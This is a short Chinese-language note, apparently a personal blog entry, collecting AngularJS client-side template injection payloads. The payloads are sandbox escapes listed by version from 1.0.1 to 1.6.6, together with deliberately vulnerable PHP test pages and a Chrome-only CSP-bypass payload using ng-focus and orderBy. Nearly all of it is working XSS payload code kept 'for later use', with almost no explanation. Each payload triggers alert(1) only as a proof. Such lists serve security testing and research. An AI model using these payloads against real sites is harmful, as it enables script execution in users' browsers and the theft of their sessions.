js没好好学,先记下payload,留着以后用

1
2
3
4
5
6
7
8
9
10
11
12
13
<html ng-app>
<head>
<script src="https://code.angularjs.org/{version}/angular.min.js"></script>
</head>
<body>
<p>
<?php
$q = $_GET['q'];
echo htmlspecialchars($q,ENT_QUOTES);
?>
</p>
</body>
</html>

paylaod

v1.0.1-v1.1.5

1
?q={{ constructor.constructor('alert(1)')() }}

v1.2.0-v1.2.18

1
?q={{ a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')() }}

v1.2.19-v1.2.23

1
?q={{ toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)  }}

v1.2.24-v1.2.26

image

v1.2.27-v1.2.29/v1.3.0-v1.3.20

1
?q={{ {}.")));alert(1)//"; }}

实际测试为v1.2.20-v1.2.32/v1.3.0-v1.3.20均生效。

v1.4.0-v1.4.5(仅chrome)

1
?q={{ o={};l=o[['__lookupGetter__']];(l=l)('event')().target.defaultView.location='javascript:alert(1)'; }}

v1.4.5-1.5.8 (仅chrome)

1
?q={{ x={y:''.constructor.prototype};x.y.charAt=[].join;[1]|orderBy:'x=alert(1)' }}

v1.6.0-1.6.6

1
?q={{ [].pop.constructor('alert(1)')() }}

csp bypass (仅chrome v1.4.0-v1.6.6)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<html ng-app>
<head>
<?php
header("Content-Security-Policy:default-src 'self';script-src code.angularjs.org 'self'");
?>
<script src="https://code.angularjs.org/{version}/angular.min.js"></script>
</head>
<body>
<p>
<?php
echo $_GET['q'];
?>
</p>
</body>
</html>
1
?q=<input+autofocus ng-focus="$event.path|orderBy:'!x?[].constructor.from([x=1],alert):0'">